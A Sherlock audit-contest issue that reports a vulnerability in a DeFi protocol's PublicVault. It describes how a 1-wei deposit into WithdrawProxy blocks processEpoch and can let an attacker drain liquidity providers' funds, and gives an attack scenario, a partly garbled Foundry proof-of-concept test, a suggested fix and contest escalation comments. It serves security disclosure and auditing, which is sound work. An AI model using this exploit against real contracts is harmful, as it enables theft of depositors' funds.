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rvierdiiev - Possible to fully block PublicVault.processEpoch function. No one will be able to receive their funds #88

Open sherlock-admin opened 1 year ago

sherlock-admin commented 1 year ago



Possible to fully block PublicVault.processEpoch function. No one will be able to receive their funds


Possible to fully block PublicVault.processEpoch function. No one will be able to receive their funds

Vulnerability Detail

When liquidity providers want to redeem their share from PublicVault they call redeemFutureEpoch function which will create new WithdrawProxy for the epoch(if not created already) and then mint shares for redeemer in WithdrawProxy. PublicVault transfer user's shares to himself.

  function redeemFutureEpoch(
    uint256 shares,
    address receiver,
    address owner,
    uint64 epoch
  ) public virtual returns (uint256 assets) {
    // check to ensure that the requested epoch is not the current epoch or in the past
    require(epoch >= currentEpoch, "Exit epoch too low");

    require(msg.sender == owner, "Only the owner can redeem");
    // check for rounding error since we round down in previewRedeem.

    ERC20(address(this)).safeTransferFrom(owner, address(this), shares);

    // Deploy WithdrawProxy if no WithdrawProxy exists for the specified epoch

    emit Withdraw(msg.sender, receiver, owner, assets, shares);

    // WithdrawProxy shares are minted 1:1 with PublicVault shares
    WithdrawProxy(withdrawProxies[epoch]).mint(receiver, shares); // was withdrawProxies[withdrawEpoch]

This function mints WithdrawProxy shares 1:1 to redeemed PublicVault shares. Then later after call of processEpoch and transferWithdrawReserve the funds will be sent to the WithdrawProxy and users can now redeem their shares from it.

Function processEpoch decides how many funds should be sent to the WithdrawProxy.

    if (withdrawProxies[currentEpoch] != address(0)) {
      uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch])

      liquidationWithdrawRatio = proxySupply.mulDivDown(1e18, totalSupply());

      if (liquidationAccountants[currentEpoch] != address(0)) {

      uint256 withdrawAssets = convertToAssets(proxySupply);
      // compute the withdrawReserve
      uint256 withdrawLiquidations = liquidationsExpectedAtBoundary[
      ].mulDivDown(liquidationWithdrawRatio, 1e18);
      withdrawReserve = withdrawAssets - withdrawLiquidations;
      // burn the tokens of the LPs withdrawing
      _burn(address(this), proxySupply);


This is how it is decided how much money should be sent to WithdrawProxy. Firstly, we look at totalSupply of WithdrawProxy. uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch]).totalSupply();.

And then we convert them to assets amount. uint256 withdrawAssets = convertToAssets(proxySupply);

In the end function burns proxySupply amount of shares controlled by PublicVault. _burn(address(this), proxySupply);

Then this amount is allowed to be sent(if no auctions currently, but this is not important right now).

This all allows to attacker to make WithdrawProxy.deposit to mint new shares for him and increase totalSupply of WithdrawProxy, so proxySupply becomes more then was sent to PublicVault.

This is attack scenario.

1.PublicVault is created and funded with 50 ethers. 2.Someone calls redeemFutureEpoch function to create new WithdrawProxy for next epoch. 3.Attacker sends 1 wei to WithdrawProxy to make totalAssets be > 0. Attacker deposit to WithdrawProxy 1 wei. Now WithdrawProxy.totalSupply > PublicVault.balanceOf(PublicVault). 4.Someone call processEpoch and it reverts on burning.

As result, nothing will be send to WithdrawProxy where shares were minted for users. The just lost money.

Also this attack can be improved to drain users funds to attacker. Attacker should be liquidity provider. And he can initiate next redeem for next epoch, then deposit to new WithdrawProxy enough amount to get new shares. And call processEpoch which will send to the vault amount, that was not sent to previous attacked WithdrawProxy, as well. So attacker will take those funds.


Funds of PublicVault depositors are stolen.

Code Snippet

This is simple test that shows how external actor can corrupt WithdrawProxy.

function testWithdrawProxyDdos() public {
    Dummy721 nft = new Dummy721();
    address tokenContract = address(nft);
    uint256 tokenId = uint256(1);

    address publicVault = _createPublicVault({
      strategist: strategistOne,
      delegate: strategistTwo,
      epochLength: 14 days

      Lender({addr: address(1), amountToLend: 50 ether}),

    uint256 collateralId = tokenContract.computeId(tokenId);

    uint256 vaultTokenBalance = IERC20(publicVault).balanceOf(address(1));
    console.log("balance: ", vaultTokenBalance);

    // _signalWithdrawAtFutureEpoch(address(1), publicVault, uint64(1));
    _signalWithdraw(address(1), publicVault);

    address withdrawProxy = PublicVault(publicVault).withdrawProxies(
    );, 2);
      WETH9.deposit{value: 2}();
      //this we need to make share calculation not fail with divide by 0
      WETH9.transferFrom(address(2), withdrawProxy, 1);
      WETH9.approve(withdrawProxy, 1);

      //deposit 1 wei to make WithdrawProxy.totalSupply > PublicVault.balanceOf(address(PublicVault))
      //so processEpoch can't burn more shares
      WithdrawProxy(withdrawProxy).deposit(1, address(2));

    assertEq(vaultTokenBalance, IERC20(withdrawProxy).balanceOf(address(1)));

    vm.warp(block.timestamp + 15 days);

    //processEpoch fails, because it can't burn more amount of shares, that was sent to PublicVault

Tool used

Manual Review


Make function WithdrawProxy.deposit not callable.

IAmTurnipBoy commented 1 year ago

Escalate for 1 USDC

Causes total loss of funds for LPs when this happens. High risk

sherlock-admin commented 1 year ago

Escalate for 1 USDC

Causes total loss of funds for LPs when this happens. High risk

You've created a valid escalation for 1 USDC!

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You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

Evert0x commented 1 year ago

Escalation accepted

sherlock-admin commented 1 year ago

Escalation accepted

This issue's escalations have been accepted!

Contestants' payouts and scores will be updated according to the changes made on this issue.